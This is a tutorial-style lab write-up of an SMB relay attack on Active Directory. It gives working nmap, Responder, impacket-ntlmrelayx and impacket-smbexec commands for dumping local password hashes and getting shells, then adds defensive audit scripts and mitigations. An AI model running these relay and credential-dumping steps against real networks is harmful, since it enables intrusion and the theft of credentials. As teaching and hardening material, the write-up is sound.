SMB relay attack on Active Directory
Hello everybody, today we are going to talk about the SMB relay attack, which is a critical attack that happens on Active Directory.
First we need to talk about the SMB protocol:
SMB Protocol:
It is a network file sharing protocol. It allows devices within the same network to share files, resources, etc.
Okay, what is the relationship between SMB and the SMB relay attack?
The attack exploits a specific weakness in SMB: the protocol allows authentication messages to be relayed to another host without verifying the integrity or origin of those messages. This is particularly true in configurations where SMB signing (a mechanism that ensures message integrity) is not enforced or is disabled.
Something we have to do first is make sure that SMB signing is disabled:
Open the domain controller and check this policy:
Computer Configuration → Windows Settings → Security Options →
and check whether the signing settings are disabled.
We need some other requirements in order to launch the attack:
1: Two local machines.
2: The two users must be local admins, to be able to dump the Security Account Manager (SAM) database, which contains the password hashes of the local users.
3: Make sure that the two local machines are visible on the network.
Okay, now let's start:
First we are going to use nmap to look for the machines whose SMB signing is enabled but not required, or disabled:
nmap --script=smb2-security-mode.nse -p445 192.168.77.0/24
My server came back as signing enabled and required (the default on all servers).
Three hosts are up and we have only seen one result, which means that the SMB signing of the other hosts is disabled.
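Reading the script output by eye works for three hosts, but across a /24 it is easy to miss one. The following audit script is an added example, not part of the original write-up: it parses nmap's XML output (`nmap --script=smb2-security-mode.nse -p445 -oX scan.xml 192.168.77.0/24`) and labels every host that is up as signing-enforced, relay-exposed, or unknown. The XML sample embedded below is constructed to mimic that output, and the assumed layout (the script appears under `<hostscript>` with a table keyed by SMB dialect) is an assumption about nmap's schema. Note the caveat: a host with no script result is reported as "unknown" rather than assumed to have signing disabled, because the port may simply be closed or filtered.

```python
"""Audit nmap smb2-security-mode results for SMB relay exposure.

Added example (not from the original post). Input is nmap -oX XML; output is
a per-host label telling the defender which machines still need signing
enforced. The XML sample below is constructed.
"""
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output for four live hosts.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
  <host><status state="up"/>
    <address addr="192.168.77.130" addrtype="ipv4"/>
    <hostscript><script id="smb2-security-mode" output="...">
      <table key="3.1.1"><elem>Message signing enabled and required</elem></table>
    </script></hostscript>
  </host>
  <host><status state="up"/>
    <address addr="192.168.77.133" addrtype="ipv4"/>
    <hostscript><script id="smb2-security-mode" output="...">
      <table key="3.1.1"><elem>Message signing enabled but not required</elem></table>
    </script></hostscript>
  </host>
  <host><status state="up"/>
    <address addr="192.168.77.134" addrtype="ipv4"/>
    <hostscript><script id="smb2-security-mode" output="...">
      <table key="3.0.2"><elem>Message signing disabled</elem></table>
    </script></hostscript>
  </host>
  <host><status state="up"/>
    <address addr="192.168.77.1" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

ENFORCED = "enforced"      # signing required: a relayed, unsigned session is rejected
EXPOSED = "relay-exposed"  # signing optional or off: relay succeeds
UNKNOWN = "unknown"        # no script result (port closed, filtered, or not SMB2)


def classify(message: str) -> str:
    """Map the script's human-readable status text to a risk label."""
    text = message.lower()
    # "enabled but not required" must be checked before the generic "required".
    if "not required" in text or "disabled" in text:
        return EXPOSED
    if "required" in text:
        return ENFORCED
    return UNKNOWN


def audit(xml_text: str) -> dict:
    """Return {ip: label} for every host the scan reports as up."""
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        label = UNKNOWN
        for script in host.iter("script"):
            if script.get("id") != "smb2-security-mode":
                continue
            for elem in script.iter("elem"):
                label = classify(elem.text or "")
        results[addr.get("addr")] = label
    return results


def hosts_needing_signing(xml_text: str) -> list:
    """IPs where signing must be enforced before relay is neutralised."""
    return sorted(ip for ip, label in audit(xml_text).items() if label == EXPOSED)


if __name__ == "__main__":
    for ip, label in sorted(audit(SAMPLE_XML).items()):
        print(f"{ip:<16} {label}")
    print("fix first:", hosts_needing_signing(SAMPLE_XML))
```

Run it against a real scan by replacing SAMPLE_XML with the contents of scan.xml; the "fix first" list is the set of hosts to push the signing policy to.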
Next, make sure that Responder's SMB and HTTP servers are off, because we don't want Responder to capture the traffic coming from the victim; we just want to relay it (forward it).
Now launch Responder, giving it the name of your network interface:
sudo responder -I eth0 -dwv
Check in the startup output that the HTTP and SMB servers are shown as off.
And now let's run ntlmrelayx (to intercept the traffic and get back the hashes of the local users).
First we set up the target machines. In my case I have two machines:
192.168.77.133
192.168.77.134
I used 192.168.77.134 as the target and created a file called target.txt containing its IP address,
then ran our tool:
impacket-ntlmrelayx -tf target.txt -smb2support
Let's go to the 192.168.77.134 machine and point it at our Kali (attacker) IP (or type anything that will make the DNS lookup fail),
and we are going to see this.
Get back to your Kali machine:
Look at this (it must be attractive, by the way):
we have got the hashes of the local users.
Okay, what else can we do? We can get a shell on the victim by adding -i:
impacket-ntlmrelayx -tf target.txt -smb2support -i
With -i we get an interactive shell.
Look at the last line: it tells us that there is a shell available on 127.0.0.1:11000.
Open a new tab and type:
nc 127.0.0.1 11000
These are the commands available to us; let's explore.
I will open the c$ share and list its directories.
Okay, what else can we do? We can get a reverse shell.
We have several options:
1: impacket-psexec
2: impacket-smbexec
3: impacket-wmiexec
Everyone's case is different; some will work and some will not,
so try all of them until you find the one that works.
As we cracked the passwords in the previous article (go check it),
we will use impacket-smbexec:
impacket-smbexec domainName/username:password@ipaddr
Mitigation
1: Enable SMB Signing: enforcing SMB signing on both clients and servers ensures the integrity of the messages and prevents unauthorized relaying, but this method will cause some performance overhead.
To enable it:
Computer Configuration → Windows Settings → Security Options → you will see two options. Set both
"Microsoft network client: Digitally sign communications (always)" and "Microsoft network server: Digitally sign communications (always)" to Enabled.
2: Disable NTLM Authentication → so that Kerberos is used, and once Kerberos fails Windows will not be able to fall back to NTLM.
3: Enforce strong password policies and MFA (multi-factor authentication).
4: Deploy local admin restrictions:
Computer Configuration → Windows Settings → Local Policies → Security Options →
Set "User Account Control: Admin Approval Mode for the Built-in Administrator account" to Enabled.
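After pushing these policies, it is worth verifying that they actually landed on each host rather than trusting the GPO editor. The script below is an added example, not part of the original write-up: it parses the text that `reg query` prints on Windows (the sample here is constructed) and checks the registry values the above Group Policy settings write to. The mapping is: the two signing policies set RequireSecuritySignature under the LanmanWorkstation and LanmanServer Parameters keys; the "Disable NTLM" item corresponds to the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy (RestrictSendingNTLMTraffic, 2 = Deny all); and the UAC item sets FilterAdministratorToken. Treating an absent value as "not enforced" is an assumption made by this example.

```python
"""Verify the anti-relay hardening settings against a reg query dump.

Added example (not from the original post). Parses `reg query` style text and
reports which of the write-up's mitigations are still not enforced.
"""
import re

# Policy display name -> (registry key, value name, expected DWORD)
POLICIES = {
    "Microsoft network client: Digitally sign communications (always)":
        (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters",
         "RequireSecuritySignature", 1),
    "Microsoft network server: Digitally sign communications (always)":
        (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters",
         "RequireSecuritySignature", 1),
    "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers":
        (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0",
         "RestrictSendingNTLMTraffic", 2),
    "User Account Control: Admin Approval Mode for the Built-in Administrator account":
        (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
         "FilterAdministratorToken", 1),
}

# Constructed sample: concatenated output of several `reg query` calls on a
# host where only the server-side signing policy has been enforced so far.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters
    RequireSecuritySignature    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
    RequireSecuritySignature    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0
    RestrictSendingNTLMTraffic    REG_DWORD    0x0
"""

# One indented value line: "    Name    REG_DWORD    0x1"
VALUE_LINE = re.compile(r"^\s+(\S+)\s+REG_DWORD\s+0x([0-9A-Fa-f]+)\s*$")


def parse_reg_query(text: str) -> dict:
    """Return {(key_path, value_name): int} from reg query output."""
    values = {}
    current_key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current_key = line.strip()  # a key header starts a new block
            continue
        m = VALUE_LINE.match(line)
        if m and current_key:
            values[(current_key, m.group(1))] = int(m.group(2), 16)
    return values


def evaluate(values: dict) -> dict:
    """Return {policy name: 'ok' | 'missing' | 'weak (...)'} for each policy."""
    findings = {}
    for policy, (key, name, expected) in POLICIES.items():
        actual = values.get((key, name))
        if actual is None:
            # Assumption: a value that was never written means the policy is not set.
            findings[policy] = "missing (policy not set)"
        elif actual == expected:
            findings[policy] = "ok"
        else:
            findings[policy] = f"weak (value={actual}, expected {expected})"
    return findings


def not_enforced(text: str) -> list:
    """Policies from the write-up that this host still lacks."""
    return sorted(p for p, r in evaluate(parse_reg_query(text)).items() if r != "ok")


if __name__ == "__main__":
    for policy, result in evaluate(parse_reg_query(SAMPLE_REG_OUTPUT)).items():
        print(f"{result:<35} {policy}")
```

Denying all outgoing NTLM is the strict end of mitigation 2 and will break any client or service that cannot do Kerberos, so roll it out in audit mode first; the signing and UAC settings are safe to enforce everywhere.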
Phew, that was intensive.
Okay, we have come to the end of our write-up today. Thanks for your time.
Linkedin: https://www.linkedin.com/in/samararisha/